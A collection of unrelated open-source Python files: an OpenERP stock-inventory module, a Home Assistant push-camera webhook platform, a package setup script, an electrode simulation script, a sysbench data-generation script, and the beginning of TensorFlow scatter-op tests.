for inv in self.browse(cr, uid, ids, context=context):
move_obj.action_cancel(cr, uid, [x.id for x in inv.move_ids], context=context)
for move in inv.move_ids:
account_move_ids = account_move_obj.search(cr, uid, [('name', '=', move.name)])
if account_move_ids:
account_move_data_l = account_move_obj.read(cr, uid, account_move_ids, ['state'], context=context)
for account_move in account_move_data_l:
if account_move['state'] == 'posted':
raise osv.except_osv(_('User Error!'),
_('In order to cancel this inventory, you must first unpost related journal entries.'))
account_move_obj.unlink(cr, uid, [account_move['id']], context=context)
self.write(cr, uid, [inv.id], {'state': 'cancel'}, context=context)
return True
stock_inventory()
class stock_inventory_line(osv.osv):
_name = "stock.inventory.line"
_description = "Inventory Line"
_rec_name = "inventory_id"
_columns = {
'inventory_id': fields.many2one('stock.inventory', 'Inventory', ondelete='cascade', select=True),
'location_id': fields.many2one('stock.location', 'Location', required=True),
'product_id': fields.many2one('product.product', 'Product', required=True, select=True),
'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True),
'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure')),
'company_id': fields.related('inventory_id','company_id',type='many2one',relation='res.company',string='Company',store=True, select=True, readonly=True),
'prod_lot_id': fields.many2one('stock.production.lot', 'Serial Number', domain="[('product_id','=',product_id)]"),
'state': fields.related('inventory_id','state',type='char',string='Status',readonly=True),
}
def _default_stock_location(self, cr, uid, context=None):
try:
location_model, location_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
except (orm.except_orm, ValueError):
location_id = False
return location_id
_defaults = {
'location_id': _default_stock_location
}
def on_change_product_id(self, cr, uid, ids, location_id, product, uom=False, to_date=False):
""" Changes UoM and name if product_id changes.
@param location_id: Location id
@param product: Changed product_id
@param uom: UoM product
@return: Dictionary of changed values
"""
if not product:
return {'value': {'product_qty': 0.0, 'product_uom': False, 'prod_lot_id': False}}
obj_product = self.pool.get('product.product').browse(cr, uid, product)
uom = uom or obj_product.uom_id.id
amount = self.pool.get('stock.location')._product_get(cr, uid, location_id, [product], {'uom': uom, 'to_date': to_date, 'compute_child': False})[product]
result = {'product_qty': amount, 'product_uom': uom, 'prod_lot_id': False}
return {'value': result}
stock_inventory_line()
#----------------------------------------------------------
# Stock Warehouse
#----------------------------------------------------------
class stock_warehouse(osv.osv):
_name = "stock.warehouse"
_description = "Warehouse"
_columns = {
'name': fields.char('Name', size=128, required=True, select=True),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True),
'partner_id': fields.many2one('res.partner', 'Owner Address'),
'lot_input_id': fields.many2one('stock.location', 'Location Input', required=True, domain=[('usage','<>','view')]),
'lot_stock_id': fields.many2one('stock.location', 'Location Stock', required=True, domain=[('usage','=','internal')]),
'lot_output_id': fields.many2one('stock.location', 'Location Output', required=True, domain=[('usage','<>','view')]),
}
def _default_lot_input_stock_id(self, cr, uid, context=None):
try:
lot_input_stock_model, lot_input_stock_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [lot_input_stock_id], 'read', context=context)
except (ValueError, orm.except_orm):
            # the user does not have read access on the location or it does not exist
lot_input_stock_id = False
return lot_input_stock_id
def _default_lot_output_id(self, cr, uid, context=None):
try:
lot_output_model, lot_output_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_output')
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [lot_output_id], 'read', context=context)
except (ValueError, orm.except_orm):
            # the user does not have read access on the location or it does not exist
lot_output_id = False
return lot_output_id
_defaults = {
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.inventory', context=c),
'lot_input_id': _default_lot_input_stock_id,
'lot_stock_id': _default_lot_input_stock_id,
'lot_output_id': _default_lot_output_id,
}
stock_warehouse()
#----------------------------------------------------------
# "Empty" Classes that are used to vary from the original stock.picking (that are dedicated to the internal pickings)
# in order to offer a different usability with different views, labels, available reports/wizards...
#----------------------------------------------------------
class stock_picking_in(osv.osv):
_name = "stock.picking.in"
_inherit = "stock.picking"
_table = "stock_picking"
_description = "Incoming Shipments"
def search(self, cr, user, args, offset=0, limit=None, order=None, context=None, count=False):
return self.pool.get('stock.picking').search(cr, user, args, offset, limit, order, context, count)
def read(self, cr, uid, ids, fields=None, context=None, load='_classic_read'):
return self.pool.get('stock.picking').read(cr, uid, ids, fields=fields, context=context, load=load)
def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False):
return self.pool['stock.picking'].read_group(cr, uid, domain, fields, groupby, offset=offset, limit=limit, context=context, orderby=orderby)
def check_access_rights(self, cr, uid, operation, raise_exception=True):
        #override in order to redirect the check of access rights to the stock.picking object
return self.pool.get('stock.picking').check_access_rights(cr, uid, operation, raise_exception=raise_exception)
def check_access_rule(self, cr, uid, ids, operation, context=None):
        #override in order to redirect the check of access rules to the stock.picking object
return self.pool.get('stock.picking').check_access_rule(cr, uid, ids, operation, context=context)
def _workflow_trigger(self, cr, uid, ids, trigger, context=None):
#override in order to trigger the workflow of stock.picking at the end of create, write and unlink operation
        #instead of its own workflow (which does not exist)
return self.pool.get('stock.picking')._workflow_trigger(cr, uid, ids, trigger, context=context)
def _workflow_signal(self, cr, uid, ids, signal, context=None):
#override in order to fire the workflow signal on given stock.picking workflow instance
        #instead of its own workflow (which does not exist)
return self.pool.get('stock.picking')._workflow_signal(cr, uid, ids, signal, context=context)
def message_post(self, *args, **kwargs):
"""Post the message on stock.picking to be able to see it in the form view when using the chatter"""
return self.pool.get('stock.picking').message_post(*args, **kwargs)
def message_subscribe(self, *args, **kwargs):
"""Send the subscribe action on stock.picking model as it uses _name in request"""
return self.pool.get('stock.picking').message_subscribe(*args, **kwargs)
def message_unsubscribe(self, *args, **kwargs):
"""Send the unsubscribe action on stock.picking model to match with subscribe"""
return self.pool.get('stock.picking').message_unsubscribe(*args, **kwargs)
def default_get(self, cr, uid, fields_list, context=None):
# merge defaults from stock.picking with possible defaults defined on stock.picking.in
defaults = self.pool['stock.picking'].default_get(cr, uid, fields_list, context=context)
in_defaults = super(stock_picking_in, self).default_get(cr, uid, fields_list, context=context)
defaults.update(in_defaults)
return defaults
def copy(self, cr, uid, id, default=None, context=None):
return self.pool['stock.picking'].copy(cr, uid, id, default=default, context=context)
_columns = {
'backorder_id': fields.many2one('stock.picking.in', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
'state': fields.selection(
[('draft', 'Draft'),
('auto', 'Waiting Another Operation'),
('confirmed', 'Waiting Availability'),
('assigned', 'Ready to Receive'),
('done', 'Received'),
('cancel', 'Cancelled'),],
'Status', readonly=True, select=True,
help="""* Draft: not confirmed yet and will not be scheduled until confirmed\n
* Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
* Waiting Availability: still waiting for the availability of products\n
* Ready to Receive: products reserved, simply waiting for confirmation.\n
* Received: has been processed, can't be modified or cancelled anymore\n
* Cancelled: has been cancelled, can't be confirmed anymore"""),
}
_defaults = {
'type': 'in',
}
class stock_picking_out(osv.osv):
_name = "stock.picking.out"
_inherit = "stock.picking"
_table = "stock_picking"
_description = "Delivery Orders"
def search(self, cr, user, args, offset=0, limit=None, order=None, context=None, count=False):
return self.pool.get('stock.picking').search(cr, user, args, offset, limit, order, context, count)
def read(self, cr, uid, ids, fields=None, context=None, load='_classic_read'):
return self.pool.get('stock.picking').read(cr, uid, ids, fields=fields, context=context, load=load)
def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False):
return self.pool['stock.picking'].read_group(cr, uid, domain, fields, groupby, offset=offset, limit=limit, context=context, orderby=orderby)
def check_access_rights(self, cr, uid, operation, raise_exception=True):
        #override in order to redirect the check of access rights to the stock.picking object
return self.pool.get('stock.picking').check_access_rights(cr, uid, operation, raise_exception=raise_exception)
def check_access_rule(self, cr, uid, ids, operation, context=None):
        #override in order to redirect the check of access rules to the stock.picking object
return self.pool.get('stock.picking').check_access_rule(cr, uid, ids, operation, context=context)
def _workflow_trigger(self, cr, uid, ids, trigger, context=None):
#override in order to trigger the workflow of stock.picking at the end of create, write and unlink operation
        #instead of its own workflow (which does not exist)
return self.pool.get('stock.picking')._workflow_trigger(cr, uid, ids, trigger, context=context)
def _workflow_signal(self, cr, uid, ids, signal, context=None):
#override in order to fire the workflow signal on given stock.picking workflow instance
        #instead of its own workflow (which does not exist)
return self.pool.get('stock.picking')._workflow_signal(cr, uid, ids, signal, context=context)
def message_post(self, *args, **kwargs):
"""Post the message on stock.picking to be able to see it in the form view when using the chatter"""
return self.pool.get('stock.picking').message_post(*args, **kwargs)
def message_subscribe(self, *args, **kwargs):
"""Send the subscribe action on stock.picking model as it uses _name in request"""
return self.pool.get('stock.picking').message_subscribe(*args, **kwargs)
def message_unsubscribe(self, *args, **kwargs):
"""Send the unsubscribe action on stock.picking model to match with subscribe"""
return self.pool.get('stock.picking').message_unsubscribe(*args, **kwargs)
def default_get(self, cr, uid, fields_list, context=None):
# merge defaults from stock.picking with possible defaults defined on stock.picking.out
defaults = self.pool['stock.picking'].default_get(cr, uid, fields_list, context=context)
out_defaults = super(stock_picking_out, self).default_get(cr, uid, fields_list, context=context)
defaults.update(out_defaults)
return defaults
def copy(self, cr, uid, id, default=None, context=None):
return self.pool['stock.picking'].copy(cr, uid, id, default=default, context=context)
_columns = {
'backorder_id': fields.many2one('stock.picking.out', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
'state': fields.selection(
[('draft', 'Draft'),
('auto', 'Waiting Another Operation'),
('confirmed', 'Waiting Availability'),
('assigned', 'Ready to Deliver'),
('done', 'Delivered'),
('cancel', 'Cancelled'),],
'Status', readonly=True, select=True,
help="""* Draft: not confirmed yet and will not be scheduled until confirmed\n
* Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
* Waiting Availability: still waiting for the availability of products\n
* Ready to Deliver: products reserved, simply waiting for confirmation.\n
* Delivered: has been processed, can't be modified or cancelled anymore\n
* Cancelled: has been cancelled, can't be confirmed anymore"""),
}
_defaults = {
'type': 'out',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| quanvm009/codev7 | openerp/addons/stock/stock.py | Python | agpl-3.0 | 164,671 |
"""Camera platform that receives images through HTTP POST."""
import logging
import asyncio
from collections import deque
from datetime import timedelta
import voluptuous as vol
import aiohttp
import async_timeout
from homeassistant.components.camera import Camera, PLATFORM_SCHEMA,\
STATE_IDLE, STATE_RECORDING
from homeassistant.components.camera.const import DOMAIN
from homeassistant.core import callback
from homeassistant.const import CONF_NAME, CONF_TIMEOUT, CONF_WEBHOOK_ID
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.event import async_track_point_in_utc_time
import homeassistant.util.dt as dt_util
_LOGGER = logging.getLogger(__name__)
CONF_BUFFER_SIZE = 'buffer'
CONF_IMAGE_FIELD = 'field'
DEFAULT_NAME = "Push Camera"
ATTR_FILENAME = 'filename'
ATTR_LAST_TRIP = 'last_trip'
PUSH_CAMERA_DATA = 'push_camera'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_BUFFER_SIZE, default=1): cv.positive_int,
vol.Optional(CONF_TIMEOUT, default=timedelta(seconds=5)): vol.All(
cv.time_period, cv.positive_timedelta),
vol.Optional(CONF_IMAGE_FIELD, default='image'): cv.string,
vol.Required(CONF_WEBHOOK_ID): cv.string,
})
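# Illustrative configuration.yaml entry for this platform (values are hypothetical):
#
#   camera:
#     - platform: push
#       name: dog_camera
#       buffer: 3
#       timeout: 10
#       field: image
#       webhook_id: dog_camera_webhook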
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Set up the Push Camera platform."""
if PUSH_CAMERA_DATA not in hass.data:
hass.data[PUSH_CAMERA_DATA] = {}
webhook_id = config.get(CONF_WEBHOOK_ID)
cameras = [PushCamera(hass,
config[CONF_NAME],
config[CONF_BUFFER_SIZE],
config[CONF_TIMEOUT],
config[CONF_IMAGE_FIELD],
webhook_id)]
async_add_entities(cameras)
async def handle_webhook(hass, webhook_id, request):
"""Handle incoming webhook POST with image files."""
try:
with async_timeout.timeout(5, loop=hass.loop):
data = dict(await request.post())
except (asyncio.TimeoutError, aiohttp.web.HTTPException) as error:
_LOGGER.error("Could not get information from POST <%s>", error)
return
camera = hass.data[PUSH_CAMERA_DATA][webhook_id]
if camera.image_field not in data:
_LOGGER.warning("Webhook call without POST parameter <%s>",
camera.image_field)
return
await camera.update_image(data[camera.image_field].file.read(),
data[camera.image_field].filename)
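# A camera image can then be pushed with a multipart POST to the generated webhook URL,
# e.g. (illustrative host and webhook id, matching the configuration sketch above):
#
#   curl -X POST -F "image=@snapshot.jpg" \
#        http://localhost:8123/api/webhook/dog_camera_webhook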
class PushCamera(Camera):
"""The representation of a Push camera."""
def __init__(self, hass, name, buffer_size, timeout, image_field,
webhook_id):
"""Initialize push camera component."""
super().__init__()
self._name = name
self._last_trip = None
self._filename = None
self._expired_listener = None
self._state = STATE_IDLE
self._timeout = timeout
self.queue = deque([], buffer_size)
self._current_image = None
self._image_field = image_field
self.webhook_id = webhook_id
self.webhook_url = \
hass.components.webhook.async_generate_url(webhook_id)
async def async_added_to_hass(self):
"""Call when entity is added to hass."""
self.hass.data[PUSH_CAMERA_DATA][self.webhook_id] = self
try:
self.hass.components.webhook.async_register(DOMAIN,
self.name,
self.webhook_id,
handle_webhook)
except ValueError:
_LOGGER.error("In <%s>, webhook_id <%s> already used",
self.name, self.webhook_id)
@property
def image_field(self):
"""HTTP field containing the image file."""
return self._image_field
@property
def state(self):
"""Return current state of the camera."""
return self._state
async def update_image(self, image, filename):
"""Update the camera image."""
if self._state == STATE_IDLE:
self._state = STATE_RECORDING
self._last_trip = dt_util.utcnow()
self.queue.clear()
self._filename = filename
self.queue.appendleft(image)
@callback
def reset_state(now):
"""Set state to idle after no new images for a period of time."""
self._state = STATE_IDLE
self._expired_listener = None
_LOGGER.debug("Reset state")
self.async_schedule_update_ha_state()
if self._expired_listener:
self._expired_listener()
self._expired_listener = async_track_point_in_utc_time(
self.hass, reset_state, dt_util.utcnow() + self._timeout)
self.async_schedule_update_ha_state()
async def async_camera_image(self):
"""Return a still image response."""
if self.queue:
if self._state == STATE_IDLE:
self.queue.rotate(1)
self._current_image = self.queue[0]
return self._current_image
@property
def name(self):
"""Return the name of this camera."""
return self._name
@property
def motion_detection_enabled(self):
"""Camera Motion Detection Status."""
return False
@property
def device_state_attributes(self):
"""Return the state attributes."""
return {
name: value for name, value in (
(ATTR_LAST_TRIP, self._last_trip),
(ATTR_FILENAME, self._filename),
) if value is not None
}
| MartinHjelmare/home-assistant | homeassistant/components/push/camera.py | Python | apache-2.0 | 5,809 |
#!/usr/bin/env python3
# coding: utf-8
"""Plotting and analysis tools for the ARTIS 3D supernova radiative transfer code."""
import datetime
import os
import sys
from setuptools import find_packages, setup
from setuptools.command.test import test as TestCommand
from artistools import console_scripts
class PyTest(TestCommand):
"""Setup the py.test test runner."""
def finalize_options(self):
"""Set options for the command line."""
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
"""Execute the test runner command."""
# Import here, because outside the required eggs aren't loaded yet
import pytest
sys.exit(pytest.main(self.test_args))
print(datetime.datetime.now().isoformat())
setup(
name="artistools",
version="0.1.dev0",
# version=datetime.datetime.now().isoformat(),
author="Luke Shingles",
author_email="[email protected]",
packages=find_packages(),
url="https://www.github.com/lukeshingles/artistools/",
license="MIT",
description="Plotting and analysis tools for the ARTIS 3D supernova radiative transfer code.",
long_description=open(
os.path.join(os.path.dirname(__file__), "README.md")).read(),
install_requires=open(
os.path.join(os.path.dirname(__file__), "requirements.txt")).read(),
entry_points={
'console_scripts': console_scripts
},
    python_requires='>=3.8',
# test_suite='tests',
setup_requires=['coveralls', 'pytest', 'pytest-runner', 'pytest-cov'],
tests_require=['coveralls', 'pytest', 'pytest-runner', 'pytest-cov'],
include_package_data=True)
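# Illustrative editable install for local development (command assumed, not part of setup()):
#   pip install -e .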
| lukeshingles/artistools | setup.py | Python | mit | 1,709 |
import lib.solutions.pbs.modelParameters as parameters
import lib.interface
import lib.spice
import lib.files.measurements
import lib.plot.formatter
import scipy.optimize
import matplotlib.pyplot as plt
import numpy as np
import time
import sys
import math
#==============================================================================
# Measurement Notes
#==============================================================================
# When the E5270 increments its output voltage it does so like a capacitor
# charging. A sufficient approximation suitable for simulation would to be
# to assume a linear rise by the 50mV in 500e-6 seconds.
print("This file has been kept for archive purposes, but does not function in its current state")
sys.exit()
def toImpedance(voltage, current):
return map(lambda (voltage, current): voltage / current,
zip(voltage, current))
class PBSParameterSet(object):
concentration = None
i0 = 3.5e-9
n = 1.0
i0_scaler = 1.0
n_scaler = 1.0
def __init__(self, concentration):
self.concentration = concentration
self.conductivity()
def conductivity(self):
"""
Converts a concentration of PBS into a conductivity according to a
least squares fit of the solutions used
"""
m = 1.67296736e-02 # Determined from optimisation
c = 8.54665149e-05 # Determined from optimisation
return m * self.concentration + c
def ladder_Resistor_RadialElectrode(self):
return 0.407 / self.conductivity()
def ladder_Resistor_RadialInsulator(self):
return self.ladder_Resistor_RadialElectrode() * (3.0 / 4.0)
def ladder_Resistor_LongitudinalCommence(self):
return 3.71 / self.conductivity()
def displacement_m(self):
return 1.34
def displacement_k(self):
return 1.773
def displacement_mag(self):
"""
The value of the CPE impedance magnitude at 1Hz
"""
return 3284 * math.pow(self.concentration, -0.158)
def displacement_slope(self):
return -0.79052566
def faradaic_CM(self):
return None
def faradaic_RM(self):
return None
def faradaic_i0(self):
return self.i0 * self.i0_scaler
def faradaic_n(self):
return self.n * self.n_scaler
def seriesResistance(self):
"""
Model series resistance or Rs as it is called in the paper.
"""
return 13.38 * math.pow(self.concentration, -0.8397)
def temperature(self):
return 20.0
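# Illustrative usage of the parameter set above (values follow the fitted relations;
# units are whatever the original author assumed):
#   params = PBSParameterSet(1.0)     # 1X PBS
#   params.conductivity()             # ~0.0168  (m * 1.0 + c)
#   params.seriesResistance()         # ~13.38   (13.38 * 1.0 ** -0.8397)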
def simulate_PBS_CPE(concentration, frequencies):
#==========================================================================
# Create the model
#==========================================================================
pbs_parameters = parameters.ParameterSet(concentration)
interfaceModel = lib.interface.Model(pbs_parameters)
spice_ckt = interfaceModel.get_spiceModel()
spice_ckt.append('R_in 1 e2 0')
spice_ckt.append('R_out 0 e7 0')
spice_ckt.append('V1 1 0 DC 0 AC 1')
#==========================================================================
# Simulate the circuit
#==========================================================================
simulator = lib.spice.Simulator()
analysis = ('AC lin 1', frequencies)
# analysis = 'AC DEC 10 0.05 10000'
measurements = [simulator.Measurement('v(e7,e6)', 'voltage'),
simulator.Measurement('i(V1)', 'current')]
results = simulator.simulate(spice_ckt,
analysis,
measurements)
#==========================================================================
# Process results
#==========================================================================
return (results['frequency'], toImpedance(results['voltage'],
results['current']))
def build_peasewiseLinear(sampleConc):
data = np.load('measurements/pbs/faradaic/diode/dilutionRun/' + str(sampleConc) + 'X-PBS_64s_stirred.npy')
pieces = []
lastVoltage = data['voltage'][0]
for row in data:
if round(row['voltage'], 3) >= 1.05:
break
elif row['voltage'] != lastVoltage:
print row['voltage']
pieces.append((row['time'] - 1, round(lastVoltage, 2)))
pieces.append((row['time'], round(row['voltage'], 2)))
lastVoltage = row['voltage']
return pieces
linearPieces = None
def simulate_PBS_Faradaic(pbs_parameters):
global linearPieces
#==========================================================================
# Create the model
#==========================================================================
if pbs_parameters is False:
print 'loading default parameters'
pbs_parameters = PBSParameterSet(1.0)
concentration = pbs_parameters.concentration
interfaceModel = lib.interface.Model(pbs_parameters)
spice_ckt = interfaceModel.get_spiceModel()
spice_ckt.append('R_in 1 e7 0')
spice_ckt.append('R_out 0 e2 0')
line = 'V1 1 0 DC 0 PWL('
if linearPieces is None:
linearPieces = build_peasewiseLinear(concentration)
for piece in linearPieces:
line += str(piece[0]) + ' ' + str(piece[1]) + ' '
line += ')'
spice_ckt.append(line)
#==========================================================================
# Simulate the circuit
#==========================================================================
simulator = lib.spice.Simulator()
analysis = 'TRAN ' + str(1) + ' 651 0'
# analysis = 'AC DEC 10 0.05 10000'
measurements = [simulator.Measurement('v(e7,e2)', 'voltage'),
simulator.Measurement('i(V1)', 'current')]
results = simulator.simulate(spice_ckt,
analysis,
measurements,
timeout=60)
#==========================================================================
# Process results
#==========================================================================
return (list(results['time']), map(lambda x:-x, list(results['current'])))
def compare_Sim_Meas_CPE():
concentrations = [1.0, 0.5, 0.25, 0.1, 0.05, 0.025]
for concentration in concentrations:
data = lib.files.measurements.get('displacement', concentration)
plt.scatter(data['frequency'], map(abs, data['impedance']))
frequencies = list(data['frequency'])
for concentration in concentrations:
frequency, impedance = simulate_PBS_CPE(concentration, frequencies)
plt.plot(frequency, map(abs, impedance), marker='s', markersize=3)
plt.gca().set_xscale('log')
plt.gca().set_yscale('log')
plt.show()
def compare_Sim_Meas_Faradaic(parameters):
concentration = parameters.concentration
sim_time, sim_current = simulate_PBS_Faradaic(parameters)
sim_time = map(lambda x: int(round(x)), sim_time)
xs_sim = []
ys_sim = []
for (x, y) in zip(sim_time, sim_current):
if x > 195 and x not in xs_sim:
xs_sim.append(x)
ys_sim.append(y)
data = np.load('measurements/pbs/faradaic/diode/dilutionRun/' + str(concentration) + 'X-PBS_64s_stirred.npy')
xs_meas = []
ys_meas = []
for row in data:
if row['time'] > 651:
break
elif row['time'] > 195:
xs_meas.append(row['time'])
ys_meas.append(row['current'])
return (xs_sim, ys_sim, xs_meas, ys_meas)
def filter_Sim_Meas_Faradaic(args):
points = [196 + x * 65 for x in range(8)]
xs_sim, ys_sim, xs_meas, ys_meas = args
xs = points
ys_out_meas = map(lambda x: ys_meas[xs_meas.index(x)], points)
ys_out_sim = map(lambda x: ys_sim[xs_sim.index(x)], points)
return (xs, ys_out_sim, xs, ys_out_meas)
def residuals_Sim_Meas_Faradaic(args):
xs_sim, ys_sim, xs_meas, ys_meas = args
out = []
for sim, meas in zip(ys_sim, ys_meas):
out.append((meas - sim))
return out
def plot_Sim_Meas_Faradaic():
concentrations = [1.0]
for concentration in concentrations:
xs_sim, ys_sim, xs_meas, ys_meas = compare_Sim_Meas_Faradaic(concentration)
plt.plot(xs_sim, ys_sim)
plt.scatter(xs_meas, ys_meas)
plt.show()
def residuals(p, pbs_parameters):
pbs_parameters.n = p[0]
pbs_parameters.i0 = p[1]
result = residuals_Sim_Meas_Faradaic(filter_Sim_Meas_Faradaic(compare_Sim_Meas_Faradaic(pbs_parameters)))
print p, sum(map(abs, result))
return sum(map(abs, result))
# return sum(map(abs, result))
#==============================================================================
# Manual Sweep
#==============================================================================
# n_min = 0.3
# n_max = 5.0
# i0_min = 1e-12
# i0_min = math.log10(i0_min)
# i0_max = 1e-3
# i0_max = math.log10(i0_max)
#
# pts = 50
#
# pbs_parameters = PBSParameterSet(1.0)
# ns = list(np.linspace(n_min, n_max, pts))
# i0s = list(np.logspace(i0_min, i0_max, pts))
# with open('nI0Data.csv', 'w') as f:
# for n in ns:
# for i0 in i0s:
# pbs_parameters.n = n
# pbs_parameters.i0 = i0
# try:
# result = residuals([n, i0], pbs_parameters)
# f.write(str(n) + ', ' + str(i0) + ', ' + str(result) + '\n')
# except IOError:
# f.write(str(n) + ', ' + str(i0) + ', 1.234\n')
#==============================================================================
# Optimisation
#==============================================================================
myBounds = [(1e-12, 1e-3), (0.1, 2.0)]
x0 = (1e-7, 1.0)
pbs_parameters = PBSParameterSet(1.0)
optParams = {'n': 1.0,
'i0': 1.0}
pbs_parameters.i0_scaler = optParams['i0']
pbs_parameters.n_scaler = optParams['n']
optimisedParams = scipy.optimize.fmin_l_bfgs_b(residuals,
x0=(3.0, 3.0),
approx_grad=True,
args=[pbs_parameters],
epsilon=0.01,
bounds=myBounds,
maxfun=60)
print optimisedParams
sys.exit()
while True:
for param in ['n', 'i0']:
if param == 'i0':
pbs_parameters.n_scaler = optParams['n']
bounds = [(1e-12, 1e-3)]
epsilon = 2.0
elif param == 'n':
pbs_parameters.i0_scaler = optParams['i0']
bounds = [(0.1, 3.0)]
epsilon = 2.0
optimisedParams = scipy.optimize.leastsq(residuals,
x0=[optParams[param]],
args=[pbs_parameters, param])
# optimisedParams = scipy.optimize.fmin_l_bfgs_b(residuals,
# x0=[optParams[param]],
# approx_grad=True,
# args=[pbs_parameters, param],
# epsilon=epsilon,
# bounds=bounds,
# pgtol=1e-10,
# maxfun=60)
print 'setting optparams[' + param + '] to ' + str(optimisedParams[0][0])
optParams[param] = optimisedParams[0][0]
print optimisedParams
# filter_Sim_Meas_Faradaic(compare_Sim_Meas_Faradaic(1.0))
| MarkHedleyJones/Electrode_Interface_Model | model.py | Python | mit | 11,822 |
#! /usr/bin/python
import subprocess, argparse
import logging, sys
#Usage python generateData.py allConfigurationsFile begin_configuration_index ram_value ram_level_value resultFileWithPath iterations
#
def writeToFile(i, user, j, time_now, f1,f2,f3,f4,f5,f6,r1,f_output):
# ram, cpu_freq, cpu_freq_governor, num_cores, disc_io, dirty_ratio
    f_output.write(','.join([i, user, j, time_now, f1, f2, f3, f4, f5, f6, r1]) + '\n')
f_output.flush()
if __name__ == "__main__":
logging.basicConfig(filename='generate_Data.log',level=logging.DEBUG,format='%(asctime)s %(message)s')
logging.info('New Data Generation started!!')
__doc__ = ""
epi = ""
parser = argparse.ArgumentParser(description=__doc__, epilog= epi)
parser.add_argument('allConfigurationsFile', action='store',
help=(''))
parser.add_argument('begin_configuration_index', action='store',
help=(''))
parser.add_argument('ram_value',action='store',help=(''))
parser.add_argument('ram_level_value',action='store',help=(''))
parser.add_argument('resultFileWithPath',action='store',help=(''))
parser.add_argument('iterations',action='store',help=(''))
args = parser.parse_args()
    logging.info('%s %s %s %s %s %s', args.allConfigurationsFile, args.begin_configuration_index, args.ram_value, args.ram_level_value, args.resultFileWithPath, args.iterations)
cpu_min_freq = "800000"
f_output= open(args.resultFileWithPath,'w')
f_configListFile = open(args.allConfigurationsFile,'r')
for i,line in enumerate(f_configListFile):
        if i >= int(args.begin_configuration_index) - 1:
line = line.rstrip('\n')
factor_values = line.split(":")[0:5]
line = next(f_configListFile)
factor_levels = line.split(":")[0:5]
#Usage: python configureSystem.py number_of_cores (1/3) cpu_min_freq cpu_max_freq governor io_scheduler_algo dirty_ratio
cmd_configure = "python configureSystem.py "+ factor_values[2] +" " + cpu_min_freq + " " + factor_values[0] + " " + factor_values[1] + " " + factor_values[3] + " " + factor_values[4]
logging.info('Calling configure System with parameters %s %s %s %s %s %s',factor_values[2],cpu_min_freq,factor_values[0], factor_values[1], factor_values[3], factor_values[4] )
subprocess.call(cmd_configure,shell=True)
cmd_user = "uname -n"
user = subprocess.check_output(cmd_user,shell=True).rstrip('\n')
for j in range(1, int(args.iterations)+1):
                logging.info('Calling benchmark: %s', j)
#Run benchmark script
cmd_benchmark = "python sysbench_benchmark.py"
result= subprocess.check_output(cmd_benchmark,shell=True).rstrip('\n')
cmd_date = "date"
time_now = subprocess.check_output(cmd_date,shell=True).rstrip('\n')
writeToFile(str(i), user, str(j), time_now, str(args.ram_level_value),factor_levels[0],factor_levels[1],factor_levels[2],factor_levels[3],factor_levels[4],str(result),f_output)
f_output.close()
f_configListFile.close()
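    # Illustrative invocation matching the argparse definition above (hypothetical
    # file names and values):
    #   python generateData.py allConfigs.txt 1 4096 2 results.csv 5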
| KajuBadaam/performance-meter | generateData.py | Python | gpl-2.0 | 2,985 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tf.scatter."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
def _AsType(v, vtype):
return v.astype(vtype) if isinstance(v, np.ndarray) else vtype(v)
def _NumpyAdd(ref, indices, updates):
# Since numpy advanced assignment does not support repeated indices,
# we run a simple loop to perform scatter_add.
for i, indx in np.ndenumerate(indices):
ref[indx] += updates[i]
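# Illustrative trace of the duplicate-index handling above (hypothetical values):
#   ref = np.array([1., 2., 3.]); _NumpyAdd(ref, np.array([0, 0]), np.array([5., 7.]))
#   leaves ref == [13., 2., 3.], whereas ref[[0, 0]] += [5., 7.] would only apply the
#   last update and give [8., 2., 3.].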
def _NumpyAddScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] += update
def _NumpySub(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] -= updates[i]
def _NumpySubScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] -= update
def _NumpyMul(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] *= updates[i]
def _NumpyMulScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
